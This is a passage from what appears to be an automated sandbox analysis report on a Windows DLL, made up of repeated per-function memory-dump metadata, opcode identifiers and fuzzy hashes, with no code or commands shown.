                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p
                                                          • API String ID: 0-2181537457
                                                          • Opcode ID: 9caf1df689a19b956391ec3c576a82a667aa8e6862b503aa0cf29b2fd44b838f
                                                          • Instruction ID: 45b6a046e3b77afb10071db13243d179a9482f48ba136c0af4373135af33ec65
                                                          • Opcode Fuzzy Hash: 9caf1df689a19b956391ec3c576a82a667aa8e6862b503aa0cf29b2fd44b838f
                                                          • Instruction Fuzzy Hash: D27223756087019FD358CF28CC95A6BB7E5EBC8304F04892EFA9A87351EB35E904DB52
                                                          Function 10091B30 Relevance: 2.0, Strings: 1, Instructions: 782COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: P
                                                          • API String ID: 0-3110715001
                                                          • Opcode ID: dcee423a1f63492412fbcbb5a9b3a38f1c6a8fa19ce02aef3e3991b4b20f5f9a
                                                          • Instruction ID: 33aae577ea905f5ad56b9f357bc3e0a8a7789616b4bc9bd581e9d512b627a041
                                                          • Opcode Fuzzy Hash: dcee423a1f63492412fbcbb5a9b3a38f1c6a8fa19ce02aef3e3991b4b20f5f9a
                                                          • Instruction Fuzzy Hash: 075238B56047019FD358CF28C885AABB7EAFBC8340F15892DF98A87351EB74E905CB51
                                                          Function 10080910 Relevance: 2.0, APIs: 1, Instructions: 486COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _ftol
                                                          • String ID:
                                                          • API String ID: 2545261903-0
                                                          • Opcode ID: cdf9305ae9bd88c9371b9d2d824252dc713467f3f5229e8f155bee12b74ec04b
                                                          • Instruction ID: 93d2e9e2bcb9c4188201fd4b42363bbb7b16d0fef9119353a7c3b7c5588b8c6c
                                                          • Opcode Fuzzy Hash: cdf9305ae9bd88c9371b9d2d824252dc713467f3f5229e8f155bee12b74ec04b
                                                          • Instruction Fuzzy Hash: 3A221974A043868FD768CF18C490B9AB7E2FFC8344F11896EE9898B355D730E951CB91
                                                          Function 10097190 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p
                                                          • API String ID: 0-2181537457
                                                          • Opcode ID: ba33a32deeaccc3899d27b0f850914543690927a8c14e2df23edbb532c4b1236
                                                          • Instruction ID: 0900c8e57bf490683d2b7e3c05d321bc10fef181ac1c5a3057966d3bd183a4f1
                                                          • Opcode Fuzzy Hash: ba33a32deeaccc3899d27b0f850914543690927a8c14e2df23edbb532c4b1236
                                                          • Instruction Fuzzy Hash: C32213766047009FD358CF68C885AABB7E9FB88304F05891DF99AC7351EB74E904DB62
                                                          Function 10081090 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                          • Instruction ID: 1973868626951cbc4e1e6dbbbaae98c5aea718cf2aa9e198ecfd8e57a8fac991
                                                          • Opcode Fuzzy Hash: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                          • Instruction Fuzzy Hash: 4722F1B5A142059FCB48CF18C490A9ABBE5FF88310F558A6EFC49CB346D770E941CB91
                                                          Function 10058060 Relevance: .8, Instructions: 850COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                          • Instruction ID: f9911c3756e58d96d67ac0068ac05fe94daea12ae19a9087e13a65d9dc3f6b02
                                                          • Opcode Fuzzy Hash: 454b192ecfaca2bfeccc7b5d9f1b28ddef83bf891173fbfbdba393ab323421c2
                                                          • Instruction Fuzzy Hash: 9F626D74600B428FD734CF29D980A26B7E1FF85650B158A2DE887D7B51D730F94ACBA1
                                                          Function 10037E10 Relevance: .7, Instructions: 684COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                          • Instruction ID: 752e0dd24e133d73b6f08329f2179d760a74bb4bde05081f5036a7f9d25ca0bd
                                                          • Opcode Fuzzy Hash: 97e2224dc0ef2b1fc53d62958fd45e5f26a65b99f05693ffc431e4c50dd9cacc
                                                          • Instruction Fuzzy Hash: AE423A74504B468FC326CF18D480A6BB7F5FF89345F14496DE9868B712D731EA0ACB92
                                                          Function 100041D0 Relevance: .6, Instructions: 551COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                          • Instruction ID: 666f91e0f4e9b9f2dd51f1c7e6263b133853ce75cc250038ad35c0a21c5c6ed6
                                                          • Opcode Fuzzy Hash: ea6ab9f78f90f424b4e1c8bf84860adce0fffc767b65f905f94987ab85e84ed9
                                                          • Instruction Fuzzy Hash: 6B02F0B56087458BE704CF28D88071BB7E6EFC5294F46852CF88A87345EB35EE05C7A6
                                                          Function 10082D70 Relevance: .5, Instructions: 533COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                          • Instruction ID: 41471438a16cbbac6786139d1061e5c3017a9635662bae8005eac138925a0d7c
                                                          • Opcode Fuzzy Hash: 4797e064f56f14eac9a7beb65e631e3381fa09ee9f13918a05c30c79d5ca12ac
                                                          • Instruction Fuzzy Hash: CD3203B56042459FCB68CF28C880B9AB7E5FF88304F15866EED499B345D730EA41CF95
                                                          Function 100935E0 Relevance: .5, Instructions: 517COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d49f9ca2698f5c9137cb1864a939808f23562bb2cd5f1e57d96b5c5c5110f81
                                                          • Instruction ID: dbc2a979a44d6b80fd49868066b3bfc1fb6366c6d2716e96624389281a0adb47
                                                          • Opcode Fuzzy Hash: 3d49f9ca2698f5c9137cb1864a939808f23562bb2cd5f1e57d96b5c5c5110f81
                                                          • Instruction Fuzzy Hash: 5A122BB56087419FD364CF58C880AABB7EAFBC8304F15892DF59A87354EB70E905CB52
                                                          Function 1003E318 Relevance: .5, Instructions: 463COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9c4cca09a5c610eebd126c1ed7a7292d4696e687ae0527427cd542b6cc91d4d
                                                          • Instruction ID: a84226c31b0772432b5ebf70dfd77e863e4b193a01ee3793edd7b7329908bd1c
                                                          • Opcode Fuzzy Hash: d9c4cca09a5c610eebd126c1ed7a7292d4696e687ae0527427cd542b6cc91d4d
                                                          • Instruction Fuzzy Hash: BE12D6A5E35FA741E783AAB854424A5F3607FEB140B06AB17FC9070C42FB3AD38E4254
                                                          Function 100373F0 Relevance: .5, Instructions: 457COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 373561648ed17f623230584d40b545c58971e2c0c6a1969ba25a6d51b433a622
                                                          • Instruction ID: 6bf080dd21d2c418260dd11eed1b3b6311730e3ee8d8d0daa20e21ca440b09df
                                                          • Opcode Fuzzy Hash: 373561648ed17f623230584d40b545c58971e2c0c6a1969ba25a6d51b433a622
                                                          • Instruction Fuzzy Hash: 800257B4604B458FC326CF18C490A6BB7E5FF89305F154A6DE98A8B712D731F90ACB91
                                                          Function 1003BB90 Relevance: .4, Instructions: 446COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e2fb3a0990cb8f2fdad2bfe0b8d49da4d09b219bcd50ed853708e3854edc2e9
                                                          • Instruction ID: 029373d71355fbd2ad70396b17303df9a12dee90329dec291bf355f95b858a0e
                                                          • Opcode Fuzzy Hash: 6e2fb3a0990cb8f2fdad2bfe0b8d49da4d09b219bcd50ed853708e3854edc2e9
                                                          • Instruction Fuzzy Hash: D9122874A093418FC315CF09D48094AB7E2FFCC359F598A6DE9885B326DB30B916CB96
                                                          Function 1003C412 Relevance: .4, Instructions: 435COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40d6cc66e0b936cdead37ef532d89ee06d34439e23798db7d65ba9872918fda5
                                                          • Instruction ID: ace8e06d0a3442dc2e4d5d93a36c7dda4def718a55803d6bed4ad8f29c8fc085
                                                          • Opcode Fuzzy Hash: 40d6cc66e0b936cdead37ef532d89ee06d34439e23798db7d65ba9872918fda5
                                                          • Instruction Fuzzy Hash: BB026C756087428FC709CF1AC490A5AFBE2FFC8319F19896DD9899B316DB31E906CB41
                                                          Function 10084DD0 Relevance: .4, Instructions: 422COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a3b1edd6918a6fbb49c5e17d253c2efa91f0bc55c0e6aeb1232c13692f9d9d0
                                                          • Instruction ID: 64735ea465274e5fb1f8591c2231c0b85bce749390d1d6339555928da74c1d0a
                                                          • Opcode Fuzzy Hash: 5a3b1edd6918a6fbb49c5e17d253c2efa91f0bc55c0e6aeb1232c13692f9d9d0
                                                          • Instruction Fuzzy Hash: BFD11639B00B055FD724DE2ACC81BABB3D6EFC4310F00852DEA9B87B92D6B4F9418651
                                                          Function 1007ADD0 Relevance: .4, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
